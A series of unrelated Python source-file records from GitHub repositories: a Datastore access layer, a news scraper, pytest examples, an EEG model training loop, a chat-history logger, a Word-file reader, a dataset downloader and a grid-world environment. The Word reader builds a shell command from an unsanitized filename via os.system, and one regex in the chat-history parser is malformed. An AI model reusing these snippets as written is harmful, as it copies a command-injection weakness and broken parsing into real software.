snippetPouchArray.append(tag_dict)\n return (snippetPouchArray, customPouchArray)\n\ndef getArticleById(publisherId, articleId):\n ''' Get article by id from Datastore\n\n Args:\n publisherId (int): Publisher ID\n articleId (int): Article ID\n\n Returns:\n Article entity\n '''\n articleKey = datastore.Key('publishers', publisherId, 'articles', articleId, project=config.PROJECT_ID)\n article = ds.get(key=articleKey)\n return article\n\ndef getSnippetById(snippetId):\n ''' Get a snippet by id from Datastore\n\n Args:\n snippetId (int): Snippet ID\n\n Returns:\n Snippet entity\n '''\n snippetKey = datastore.Key('snippets', snippetId, project=config.PROJECT_ID)\n snippet = ds.get(key=snippetKey)\n return snippet\n\ndef getUnprocessedSnippets():\n ''' Get a snippet by id from Datastore\n\n Args:\n snippetId (int): Snippet ID\n\n Returns:\n Snippet entity\n '''\n query = ds.query(kind='snippets')\n #query.add_filter('wordPouch', '=', 'empty') #Datastore sucks, filter doesn't work\n snippets = list(query.fetch())\n snippets = [snip for snip in snippets if len(snip['wordPouch']) == 1]\n \n return snippets\n\ndef getSnippets():\n ''' Get all active snippets\n\n Args:\n None\n\n Returns:\n Snippets\n '''\n query = ds.query(kind='snippets')\n query.add_filter('status', '=', 'active') # Doesn't work - WTYF?!!?\n return list(query.fetch())\n\ndef saveEntity(entity):\n ds.put(entity)\n\ndef articlesBeforeDate():\n query = ds.query(kind='articles')\n query_date = datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n query.add_filter('createDate', '>=', query_date)\n\n articles = list(query.fetch())\n \n return articles\n\ndef articlesByPublisher(publisherId):\n ancestor = ds.key('publishers', publisherId)\n query = ds.query(kind='articles', ancestor=ancestor)\n return list(query.fetch())\n\ndef getPublisherArticlesByStatus(publisherId, status):\n query = ds.query(kind='articles')\n query.add_filter('status', '=', status)\n articles = list(query.fetch())\n publisherArticles = [article for article in articles if article.key.parent.id_or_name == publisherId]\n return publisherArticles\n\ndef updateStatus(entities, status):\n for ent in entities:\n ent['status'] = status\n saveEntity(ent)\n\ndef getArticlesWithSnippet(snippetId):\n query = ds.query(kind='articles')\n query.add_filter('snippetId', '=', snippetId)\n articles = list(query.fetch())\n #publisherArticles = [article for article in articles if article.key.parent.id_or_name == publisherId]\n return articles\n\ndef updateArticlesSnippetStatus(articles, status):\n for article in articles:\n currentStatus = article['snippetProperties']['status']\n print('DAL - updateArticlesSnippetStatus: updating staus [{}] => [{}] on snippet of article [{}]'.format(currentStatus, status, article.key.id_or_name))\n article['snippetProperties']['status'] = status\n saveEntity(article)\n\nif __name__ == '__main__':\n #print(len(articlesBeforeDate()))\n #print(len(getSnippets()))\n \n '''articles = getPublisherArticlesByStatus('gadgety.co.il', 'assigned')\n print('TOTAL', len(articles))\n for a in articles:\n print(a.key.id_or_name, ' - ', a['snippetId'] if 'snippetId' in a else '?');'''\n \n #updateStatus(articles, 'inactive')\n\n '''articles = getArticlesWithSnippet(5725107787923456)\n print(len(articles))\n updateArticlesSnippetStatus(articles, 'inactive')'''\n\n articles = getArticlesWithSnippet(5769015641243648)\n articles = [article for article in articles if article.key.parent.id_or_name == 'gadgety.co.il']\n #print(len(articles))\n updateArticlesSnippetStatus(articles, 'inactive')\n #lenPerArticle = {article.key.id_or_name: len(article[\"content\"].split(' ')) for article in articles}\n #lengths = [len(article[\"content\"].split(' ')) for article in articles]\n #print(lenPerArticle)\n\n \n ","repo_name":"arliber/simoti-backend","sub_path":"common/DAL.py","file_name":"DAL.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30897096399","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\n\n# news_list = []\n# for i in range(0,451,15):\n# src = f'https://www.skiddle.com/news/festivals/{i}'\n#\n# q = requests.get(src)\n# result = q.content\n# soup = BeautifulSoup(result, 'lxml')\n#\n# news = soup.find_all(class_='card-img-link')\n# for i in news:\n# news_page_url = \"https://www.skiddle.com\"+i.get('href')\n# news_list.append(news_page_url)\n# print(news_list)\n# with open('news_list.txt','a',encoding='utf-8') as file:\n# for line in news_list:\n# file.write(f'{line}\\n')\n\n\nwith open('news_list.txt') as file:\n lines = [line.strip() for line in file.readlines()]\n # пустой список для данных всех людей\n data_dict = []\n count = 0\n for line in lines:\n\n q = requests.get(line) # в i передается ссылка на новость\n result = q.content\n soup = BeautifulSoup(result,'lxml')\n new = soup.find(class_='grid').find('h1',class_='h2').text\n date = soup.find(class_='grid bg-white').find('p').text\n data = {\n 'title': new,\n 'date': date\n\n }\n count += 1\n print(f'#{count}: {line} is done!')\n data_dict.append(data)\n with open('data.json', 'w') as json_file:\n json.dump(data_dict, json_file, indent=4)","repo_name":"Colibri7/parsing","sub_path":"lesson5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38786888003","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Sequence\n\nimport pytest\nfrom django.test import TestCase\n\nfrom core.services import ExponentService\n\n\"\"\"\nDjango with Pytest Approaches\n\n- I have tried we can only utilize fixture benefit\n of pytest this way but only with driver class.\n\"\"\"\n\n\n\"\"\"\n# =================================================\n# Approach # 01 \n# =================================================\n\"\"\"\n\n\n@dataclass\nclass FixtureData:\n _input: Sequence[int]\n _expected_result: Sequence[int]\n\n\nclass ExponentServiceApproachOneTests(TestCase):\n def setUp(self) -> None:\n self.fd = {\n \"positive\": FixtureData((2, 2), [1, 4]),\n \"negative\": FixtureData((-2, -2), []),\n }\n return super().setUp()\n\n def test_get_exponents_with_positive_values(self):\n _input, _expected_result = self.fd[\"positive\"].__dict__.values()\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n def test_get_exponents_with_negative_values(self):\n _input, _expected_result = self.fd[\"negative\"].__dict__.values()\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n\n\"\"\"\n# =================================================\n# Approach # 02\n# =================================================\n\"\"\"\n\n\n@pytest.fixture(scope=\"session\")\ndef _input():\n return [(2, 2), (-1, -1)]\n\n\n@pytest.fixture(scope=\"session\")\ndef _expected_result():\n return [[1, 4], []]\n\n\n@pytest.fixture(scope=\"class\")\ndef exponent_service_fixtures(request, _input, _expected_result):\n request.cls._input = _input\n request.cls._expected_result = _expected_result\n\n\n@pytest.mark.usefixtures(\"exponent_service_fixtures\")\nclass ExponentServiceApproachTwoTests(TestCase):\n def test_get_exponents_with_positive_values(self):\n _input, _expected_result = self._input[0], self._expected_result[0]\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n def test_get_exponents_with_negative_values(self):\n _input, _expected_result = self._input[1], self._expected_result[1]\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n\n\"\"\"\n# =================================================\n\"\"\"\n\n\"\"\"\nPytest Approaches\n\n- if we use this approaches we can get all the features of pytest.\n- Moreover, Saleor is using the second approach.\n- But i think first approach will be more preferable for us\n because of our current code and it will take minimal change.\n\n\"\"\"\n\n\n\"\"\"\n# =================================================\n# Approach # 03\n# =================================================\n\"\"\"\n\n\nclass TestExponentService:\n \"\"\"\n Pytest finds both `test_` prefixed functions. There is no need to subclass anything,\n but make sure to prefix your class with Test otherwise the class will be skipped.\n \"\"\"\n\n @pytest.mark.parametrize(\n (\"_input\", \"_expected_initialization\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n )\n def test_should_define_service(self, _input, _expected_initialization):\n instance = ExponentService(*_input)\n\n assert instance.resources == _expected_initialization\n\n def test_should_not_define_service(self):\n with pytest.raises(TypeError) as e:\n ExponentService()\n\n assert \"required positional argument\" in str(e.value)\n\n @pytest.mark.parametrize(\n (\"_input\", \"_expected_result\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n )\n def test_get_exponents(self, mocker, _input, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._store_exponents\", return_value=None\n )\n\n _actual_result = ExponentService.get_exponents(*_input)\n\n assert _actual_result == _expected_result\n\n @pytest.mark.parametrize(\n (\"_input\", \"_initial\", \"_expected_result\"),\n [\n ((2, 2), [1, 2], [4, 4]), # Positive values\n ((-1, -1), [], []), # Negative values\n ((-1, 2), [], []), # Negative number of values with positive exponent\n (\n (2, -1),\n [1, 2],\n [4, 4],\n ), # Positive number of values with negative exponent\n ],\n )\n def test_store_exponents(self, mocker, _input, _initial, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._calculate_exponent\", return_value=4\n )\n instance = ExponentService(*_input)\n\n assert instance.resources == _initial\n instance._store_exponents()\n assert instance.resources == _expected_result\n\n @pytest.mark.parametrize(\n (\"_exponent_input\", \"_input\", \"_expected_result\"),\n [\n (0, 1, 1), # Zero exponent\n (2, 2, 4), # Positive exponent\n (-1, 2, 0.5), # Negative exponent\n (100, 2, 1_267_650_600_228_229_401_496_703_205_376), # Large exponent\n ],\n )\n def test_calculate_exponent(self, _exponent_input, _input, _expected_result):\n instance = ExponentService(n=random.randint(1, 100), exponent=_exponent_input)\n\n assert instance._calculate_exponent(_input) == _expected_result\n\n\n\"\"\"\n# =================================================\n# Approach # 04\n# =================================================\n\"\"\"\n\n\n@pytest.mark.parametrize(\n (\"_input\", \"_expected_result\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n)\ndef test_get_exponents(mocker, _input, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._store_exponents\",\n return_value=_expected_result,\n )\n _actual_result = ExponentService.get_exponents(*_input)\n\n assert _actual_result == _expected_result\n\n\n\"\"\"\n# =================================================\n\"\"\"\n","repo_name":"Sheikhharis50/pytest-example","sub_path":"src/core/tests/test_exponent_service.py","file_name":"test_exponent_service.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34129911497","text":"import os\r\nos.environ['PYTHONHASHSEED'] = '0'\r\n\r\nimport numpy as np\r\nnp.random.seed(1)\r\nfrom tensorflow import set_random_seed\r\nset_random_seed(2)\r\nimport random\r\nrandom.seed(9001)\r\n\r\nfrom Keras_3_Layers import Deep3Net, reduce_lr, early_stop\r\nfrom sklearn.metrics import roc_auc_score\r\n# # pair 1,2\r\n# from EEG_Processing import data_collectionC1S1, data_collectionC1S2, data_collectionC1S3, data_collectionC1S4, data_collectionC1S5, data_collectionC1S6\r\n# from EEG_Processing import validation_collectionC2S1, validation_collectionC2S2, validation_collectionC2S3, validation_collectionC2S4, validation_collectionC2S5, validation_collectionC2S6\r\n# from EEG_Processing import test_collectionC2S1, test_collectionC2S2, test_collectionC2S3, test_collectionC2S4, test_collectionC2S5, test_collectionC2S6\r\n\r\n# # pair 1,3\r\n# from EEG_Processing import data_collectionC1S1, data_collectionC1S2, data_collectionC1S3, data_collectionC1S4, data_collectionC1S5, data_collectionC1S6\r\n# from EEG_Processing import validation_collectionC3S1, validation_collectionC3S2, validation_collectionC3S3, validation_collectionC3S4, validation_collectionC3S5, validation_collectionC3S6\r\n# from EEG_Processing import test_collectionC3S1, test_collectionC3S2, test_collectionC3S3, test_collectionC3S4, test_collectionC3S5, test_collectionC3S6\r\n\r\n# pair 2,3\r\nfrom EEG_Processing import data_collectionC2S1, data_collectionC2S2, data_collectionC2S3, data_collectionC2S4, data_collectionC2S5, data_collectionC2S6\r\nfrom EEG_Processing import validation_collectionC3S1, validation_collectionC3S2, validation_collectionC3S3, validation_collectionC3S4, validation_collectionC3S5, validation_collectionC3S6\r\nfrom EEG_Processing import test_collectionC3S1, test_collectionC3S2, test_collectionC3S3, test_collectionC3S4, test_collectionC3S5, test_collectionC3S6\r\n\r\n\r\ndef data_handling(train, subject, val_test):\r\n train_data = eval('data_collectionC' + str(train) + 'S' + str(subject))['data']\r\n train_response = eval('data_collectionC' + str(train) + 'S' + str(subject))['response']\r\n val_data = eval('validation_collectionC' + str(val_test) + 'S' + str(subject))['data']\r\n val_response = eval('validation_collectionC' + str(val_test) + 'S' + str(subject))['response']\r\n\r\n test_data = eval('test_collectionC' + str(val_test) + 'S' + str(subject))['data']\r\n test_response = eval('test_collectionC' + str(val_test) + 'S' + str(subject))['response']\r\n class_weights = {0: len(train_response[train_response == 1])/len(train_response[train_response == 0]), 1: 1}\r\n\r\n data_collection = dict(train_data=train_data, train_response=train_response, val_data=val_data,\r\n val_response=val_response, test_data=test_data, test_response=test_response,\r\n class_weights=class_weights)\r\n\r\n return data_collection\r\n\r\n\r\ndef model_fit_pred(model_net, train, subject, val_test):\r\n data_collection = data_handling(train, subject, val_test)\r\n model_net.fit(data_collection['train_data'], data_collection['train_response'],\r\n batch_size=128, epochs=100, verbose=1,\r\n callbacks=[reduce_lr, early_stop], shuffle=False,\r\n validation_data=(data_collection['val_data'], data_collection['val_response']),\r\n class_weight=data_collection['class_weights'])\r\n y_pred = model_net.predict(data_collection['test_data'], batch_size=128)\r\n y_pred_auc = roc_auc_score(data_collection['test_response'], y_pred)\r\n return y_pred_auc\r\n\r\n\r\ndef pair_wise_for_loop(train_protocol, test_protocol):\r\n list_subjects = ['1', '2', '3', '4', '5', '6']\r\n model_net = Deep3Net(num_classes=1, n_filters_2=70, n_filters_3=80)\r\n list_auc = []\r\n for i in list_subjects:\r\n y_pred_auc = model_fit_pred(model_net, train_protocol, i, test_protocol)\r\n list_auc.append(y_pred_auc)\r\n return list_auc\r\n\r\n\r\n# c1c2_result_five = []\r\n# for i in range(5):\r\n# c1c2_list = pair_wise_for_loop(1,2)\r\n# c1c2_result_five.append(c1c2_list)\r\n\r\n# c1c3_result_five = []\r\n# for i in range(5):\r\n# c1c3_list = pair_wise_for_loop(1,3)\r\n# c1c3_result_five.append(c1c3_list)\r\n\r\nc2c3_result_five = []\r\nfor i in range(5):\r\n c2c3_list = pair_wise_for_loop(2,3)\r\n c2c3_result_five.append(c2c3_list)\r\n\r\n","repo_name":"estellad/Conv-EEG-Decoding","sub_path":"Pair_Transfer_Loop.py","file_name":"Pair_Transfer_Loop.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72861379359","text":"from datetime import datetime\nfrom ..file_format import dump_csv\nfrom ..file_format import load_csv\nimport re\nfrom src.checksum import get_md5\nfrom src.select_content.test_set import select_test_set\n\n\nclass ChatHistory:\n\n def __init__(self, file_path, chat_context, save_format='csv'):\n self.folder = file_path.parent.parent / 'chat_history'\n self.folder.mkdir(exist_ok=True)\n\n self.save_format = save_format\n\n self.model = chat_context['model']\n self.chat_mode = chat_context['chat_mode']\n\n self.chatlog = self.load_file()\n\n # Remove item without question id\n self.chatlog = [\n i\n for i in self.chatlog\n # if i.get('question_id') and i['answer'] != 'NA from AI'\n ]\n\n today = datetime.today()\n self.date = today.strftime(\"%Y%m%d\")\n\n def check_result_exist(self):\n for i in self.folder.iterdir():\n if 'csv' in i.suffix.lower():\n return True\n\n return False\n\n @property\n def save_file_name(self):\n return 'chat_history'\n\n @property\n def save_path(self):\n return self.folder / f\"{self.save_file_name}.{self.save_format}\"\n\n @property\n def chat_history(self):\n chat_history = []\n for i in self.chatlog:\n log = (\n f'Question: {i[\"question\"]}\\n\\n'\n f'Answer: {i[\"answer\"]}\\n\\n'\n f'Explain: {i[\"explain\"]}\\n\\n'\n f'Sentences: {i[\"sentences\"]}\\n\\n'\n f'Confidence: {i[\"confidence\"]}\\n\\n'\n )\n chat_history.append(log)\n return '\\n\\n'.join(chat_history)\n\n def log(self, resp, questions={}):\n answer = resp['answer']\n del resp['answer']\n\n answers = parse_answers(answer)\n\n # one question\n if 'question' in resp:\n [\n i.update({\n 'question': resp['question'],\n 'question_id': resp['question_id'],\n })\n for i in answers\n ]\n del resp['question']\n\n answers = [\n a\n for a in answers\n if all(\n k in a\n for k in [\n 'question',\n 'answer',\n 'explain',\n 'sentences',\n 'confidence']\n )\n ]\n\n if not answers:\n answers = [\n {\n 'question_id': qid,\n 'question': q,\n 'answer': 'NA from AI',\n 'explain': 'NA from AI',\n 'sentences': 'NA from AI',\n 'confidence': 'NA from AI',\n }\n for qid, q in questions.items()\n ]\n\n if questions:\n answers = map_answer_to_question(answers, questions)\n\n answers = [\n i\n for i in answers\n if i.get('question_id')\n ]\n\n # remove duplicated answer\n answers = {\n (i['question_id'], i['answer']): i\n for i in answers\n }\n\n answers = list(answers.values())\n\n performance = resp\n\n for a in answers:\n a.update(performance)\n a['model'] = self.model\n a['chat_mode'] = self.chat_mode\n a['date'] = self.date\n self.chatlog.append(a)\n\n self.dump_file()\n\n return answers\n\n def check_answer_exist(self, qid, question, content, run_number):\n # TODO, also check all parts being processed\n for i in self.chatlog:\n if self.find_answered_question(qid, question, content, run_number):\n return True\n return False\n\n def find_answered_question(\n self,\n qid,\n question,\n content,\n run_number,\n check_content=False,\n model_date=False):\n # TODO, for embedding method, the query of question always do once.\n result = []\n for i in self.chatlog:\n if int(i['run_number']) != run_number:\n continue\n\n if str(qid) != str(i['question_id']):\n continue\n\n # if question != i['question']:\n # continue\n\n if not model_date:\n m1 = i['model'].split('-')[:2]\n m1 = '-'.join(m1)\n m2 = self.model.split('-')[:2]\n m2 = '-'.join(m2)\n if m1 != m2:\n continue\n else:\n if self.model != i['model']:\n continue\n\n if self.chat_mode != i['chat_mode']:\n continue\n\n # if check_content and (get_md5(content) != i.get('md5')):\n # continue\n\n # if i['answer'] == 'NA from AI':\n # continue\n\n result.append(i)\n\n return result\n\n def load_file(self):\n if not self.save_path.exists():\n return []\n return load_csv(self.save_path)\n\n def dump_log(self):\n self.dump_file()\n\n def dump_file(self):\n # TODO, header order\n self.save_format = 'csv'\n dump_csv(self.save_path, self.chatlog, headers=[\n 'question_id',\n 'question',\n 'answer',\n 'explain',\n 'sentences',\n 'confidence',\n 'completion_tokens',\n 'prompt_tokens',\n 'total_tokens',\n 'seconds',\n 'model',\n 'chat_mode',\n 'date',\n ])\n\n\ndef parse_answers(answers):\n # TODO: some case the answer format is not always right, give warning.\n answer_list = []\n this_answer = []\n for i in answers.split('\\n'):\n if i.startswith('Question') and this_answer:\n answer_list.append('\\n'.join(this_answer))\n this_answer = [i]\n else:\n this_answer.append(i)\n\n if this_answer:\n answer_list.append('\\n'.join(this_answer))\n\n return [\n parse_one_answer(i)\n for i in answer_list\n ]\n\n\ndef parse_one_answer(answer):\n answer = answer.split('\\n')\n answer = [i for i in answer if i]\n result = {}\n keys = [\n 'Question:',\n 'Answer:',\n 'Explain:',\n 'Sentences:',\n 'Confidence:',\n ]\n for i in answer:\n for k in keys:\n if i.startswith(k):\n t = k[:-1].lower()\n result[t] = i.replace(k, '').strip()\n\n if 'question' in result:\n q = result['question']\n match = re.match(r'^(?P\\d+)\\.(?P.*)', q)\n if match:\n result['question_id'] = int(match.groupdict()['id'])\n result['question'] = match.groupdict()['question'].strip()\n\n return result\n\n\ndef map_answer_to_question(answers, questions):\n # TODO, check answer\n for i in answers:\n if i.get('question_id'):\n continue\n\n if not i.get('question'):\n continue\n\n q = i['question']\n for k, v in questions.items():\n if q in v:\n i['question_id'] = k\n\n return answers\n\n\ndef fix_chat_history_question():\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n human_ans = {\n str(i['id']): i['question']\n for i in load_csv(i / 'human_answer.csv')\n }\n\n table = load_csv(chat_history_file)\n for i in table:\n if i['question'] != human_ans[i['question_id']]:\n # print(i['question_id'])\n # TODO dry run\n i['question'] = human_ans[i['question_id']]\n\n dump_csv(chat_history_file, table)\n\n\ndef fix_chat_history_run_number(run_number=1):\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n for i in table:\n if i.get('run_number', '') != '':\n continue\n i['run_number'] = run_number\n\n dump_csv(chat_history_file, table)\n\n\ndef remove_chat_history_run_number(run_number=100):\n\n # Protected runs\n if run_number <= 20:\n return\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n table = [\n i\n for i in table\n if int(i.get('run_number', '')) != run_number\n ]\n\n dump_csv(chat_history_file, table)\n\n\ndef remove_chat_history_run_number_and_qid(run_number=101, question_id=[\n 2102,]):\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n table = [\n i\n for i in table\n if not (\n int(i.get('run_number', 1)) == run_number and\n int(i['question_id']) in question_id\n )\n ]\n dump_csv(chat_history_file, table)\n","repo_name":"hivdb/chatpaper","sub_path":"src/chat/chat_history.py","file_name":"chat_history.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9495811480","text":"# encoding:utf-8\nfrom zipfile import ZipFile\ntry:\n from urllib.request import urlopen, Request\nexcept ImportError:\n from urllib2 import urlopen, Request\nfrom io import BytesIO\nfrom bs4 import BeautifulSoup\nimport os,sys\n\nurl=sys.argv[1]\n\ndef _read_docx(url):\n \"\"\"\n only can be used in python2.7,\n and can be decode error in python 3.x\n \"\"\"\n if 'http://' in url:\n wordFile = urlopen(url).read()\n else:\n files=open(url,'r')\n wordFile=files.read()\n files.close()\n \n wordFile = BytesIO(wordFile)\n document = ZipFile(wordFile)\n xml_content = document.read('word/document.xml')\n\n try:\n wordObj = BeautifulSoup(xml_content.decode('utf-8'))\n except:\n wordObj = BeautifulSoup(xml_content.decode('gb18030'))\n textStrings = wordObj.findAll(\"w:t\")\n for textElem in textStrings:\n print(textElem.text)\n return textElem\n\ndef _read_doc(url):\n doc_file = url\n text_file = '%s.txt' % os.path.splitext(doc_file)[0]\n os.system(\"catdoc %s > %s\" % (doc_file, text_file))\n f = open(text_file, 'r')\n content = f.read()\n f.close()\n print (content)\n os.system('rm %s' % text_file)\n return content\n\ndef read_word_file(url):\n file_type=os.path.splitext(url)[1]\n file_type=file_type.replace('.','')\n print(file_type)\n if file_type=='doc':\n txt=_read_doc(url)\n return txt\n elif file_type=='docx':\n txt=_read_docx(url)\n return txt\n else:\n print('It is not word file')\n return\n\nfd=read_word_file(url) \n","repo_name":"davischan3168/webdata","sub_path":"otherscript/wordx2txt.py","file_name":"wordx2txt.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"29977288683","text":"import pandas\nimport numpy as np\nimport importlib.resources\nimport zipfile\nimport os\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nLongGlaucVF_20150216_URL = \"http://data.rodrep.com/LongGlaucVF_20150216.zip\" # \"http://localhost:8000/LongGlaucVF_20150216.zip\"\nLongGlaucVF_20150216_FILENAME = \"LongGlaucVF_20150216.zip\"\n\nif not importlib.resources.is_resource(__name__, LongGlaucVF_20150216_FILENAME):\n _logger.error(\"%s does not exist\", LongGlaucVF_20150216_FILENAME)\n _logger.warning(\"Downloading %s from %s\", LongGlaucVF_20150216_FILENAME, LongGlaucVF_20150216_URL)\n _logger.warning(\"By downloading, you agree to the terms of outlined by Rotterdam Ophthalmic Data Repository\")\n _logger.warning(\"Visit http://data.rodrep.com/license.html for more details\")\n\n # Hacky implementation\n dirname, basename = os.path.split(__spec__.origin)\n\n from urllib.request import urlretrieve\n urlretrieve(LongGlaucVF_20150216_URL, os.path.join(dirname, LongGlaucVF_20150216_FILENAME))\n\n _logger.warning(\"Downloaded %s\", LongGlaucVF_20150216_FILENAME)\n\nwith importlib.resources.open_binary(__name__, LongGlaucVF_20150216_FILENAME) as zf:\n root = zipfile.ZipFile(zf)\n with root.open(\"VisualFields.csv\") as f:\n VISUAL_FIELDS = pandas.read_csv(f)\n with root.open(\"VFPoints.csv\") as f:\n VF_POINTS = pandas.read_csv(f)\n\n VF_POINTS_OD = VF_POINTS.merge(VISUAL_FIELDS[[\"STUDY_ID\", \"FIELD_ID\", \"SITE\"]], how=\"left\")\n os_mask = VF_POINTS_OD[\"SITE\"] == \"OS\"\n VF_POINTS_OD[\"STUDY_SITE_ID\"] = VF_POINTS_OD[\"STUDY_ID\"] * 2 - 1 + os_mask # starts from one\n VF_POINTS_OD.loc[os_mask, \"X\"] *= -1\n VF_POINTS_OD.loc[os_mask, \"SITE\"] = \"OD\"\n VF_POINTS_OD = VF_POINTS_OD.sort_values(by=[\"FIELD_ID\", \"Y\", \"X\"], ascending=[True, False, True])\n\n M = 54\n VF_THRESHOLD = VF_POINTS_OD[\"THRESHOLD\"].to_numpy(dtype=np.float32).reshape([-1, M])\n VF_THRESHOLD_SITES = VF_POINTS_OD[\"STUDY_SITE_ID\"].to_numpy(dtype=np.int32).reshape([-1, M])\n VF_THRESHOLD_SITES = VF_THRESHOLD_SITES[:, 0]\n VF_THRESHOLD_INFO = VF_POINTS_OD.iloc[::M, :][[\"FIELD_ID\", \"STUDY_SITE_ID\"]]\n VF_THRESHOLD_INFO = VF_THRESHOLD_INFO.merge(VISUAL_FIELDS, how=\"left\")\n N, M = VF_THRESHOLD.shape\n VF_BLINDSPOTS = (25, 34)\n\n \"\"\"\n 24-2 VF Map, OD coordinates\n 00,01,02,03,\n 04,05,06,07,08, 09,\n 10,11,12,13,14,15, 16, 17,\n 18,19,20,21,22,23,24,(25),26,\n 27,28,29,30,31,32,33,(34),35,\n 36,37,38,39,40,41, 42, 43,\n 44,45,46,47,48, 49,\n 50,51,52,53\n \"\"\"\n\n","repo_name":"constructor-s/PyVF","sub_path":"pyvf/resources/rotterdam2013/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"2464888661","text":"# -*- coding: utf-8 -*-\nfrom config import *\nfrom multiprocessing import Queue\n\n\nclass GymBase:\n MAX_MSG = 50\n\n def __init__(self, matrix: np.ndarray,\n ui2env: Queue, env2ui: Queue,\n module=np, convert=np.array):\n assert (matrix == State.Now).sum() == 1\n assert (matrix == State.End).sum() == 1\n self.convert = convert\n self.module = module\n self.matrix = convert(matrix)\n self.bound = matrix.shape\n self.ui2env = ui2env\n self.env2ui = env2ui\n self.start_pos = tuple(self.convert(self.module.where(self.matrix == State.Now)).flatten())\n self.end_pos = tuple(self.convert(self.module.where(self.matrix == State.End)).flatten())\n self.now_pos = self.start_pos\n self.now_pre_state = None\n # 移动历史\n self.history = []\n # self.positions = [self.now_pos]\n self.actions = [0]\n self.rewards = [0]\n\n def reach_end(self):\n return self.end_pos == self.now_pos\n\n def define_move(self):\n # 定义移动属性\n for move_, dir_ in zip(ACTIONS, STEPS):\n setattr(self, move_, self.wrapper(self.step, move_, dir_))\n\n def wrapper(self, fun, signal, *args, **kwargs):\n \"\"\"正常包装器\"\"\"\n\n def wrap():\n return fun(*args, **kwargs)\n\n return wrap\n\n def check_legality(self, delta):\n \"\"\"检查移动合法性\"\"\"\n next_pos = tuple(self.convert(self.now_pos) + delta)\n if all(0 <= next_pos[i] < self.bound[i] for i in range(len(delta))):\n legal = State(int(self.matrix[next_pos]))\n else:\n legal = State.Bnd\n reward = REWARD[legal]\n return legal, reward, next_pos\n\n @classmethod\n def print(cls, x):\n print(f'{cls.__name__} -> {x}')\n\n def record(self, msg, reward=None):\n self.history.insert(0, msg)\n if len(self.history) > self.MAX_MSG:\n self.history.pop(-1)\n self.print(msg)\n if reward is not None:\n self.actions[-1] += 1\n self.rewards[-1] += reward\n\n def step(self, delta):\n \"\"\"移动\"\"\"\n delta = self.convert(delta)\n assert self.module.abs(delta).sum() == 1\n legal, reward, next_pos = self.check_legality(delta)\n if legal in {State.Emp, State.Trp, State.End}:\n old_pos, self.now_pos = self.now_pos, next_pos\n self.record(f'Moved from {old_pos} to {next_pos}', reward)\n # self.positions.append(self.now_pos)\n self.set_state(old_pos, self.now_pre_state if self.now_pre_state else State.Emp)\n self.now_pre_state = self.matrix[next_pos]\n self.set_state(next_pos, State.Now)\n else:\n self.record(f'Illegal move from {self.now_pos} to {next_pos}', reward)\n return reward\n\n def restart(self):\n \"\"\"重启\"\"\"\n self.record(f'{\"Game Ends. \" if self.now_pos == self.end_pos else \"\"}'\n f'Restart. Moved from {self.now_pos} to {self.start_pos}')\n self.set_state(self.now_pos, State.Emp)\n self.set_state(self.end_pos, State.End)\n self.set_state(self.start_pos, State.Now)\n # 回归起点\n self.now_pos = self.start_pos\n self.now_pre_state = None\n self.add_moves_rewards()\n\n def set_state(self, pos, state):\n self.matrix[pos] = state\n\n def add_moves_rewards(self):\n self.actions.append(0)\n self.rewards.append(0)\n\n def up(self):\n \"\"\"后续被重载\"\"\"\n\n def down(self):\n \"\"\"后续被重载\"\"\"\n\n def left(self):\n \"\"\"后续被重载\"\"\"\n\n def right(self):\n 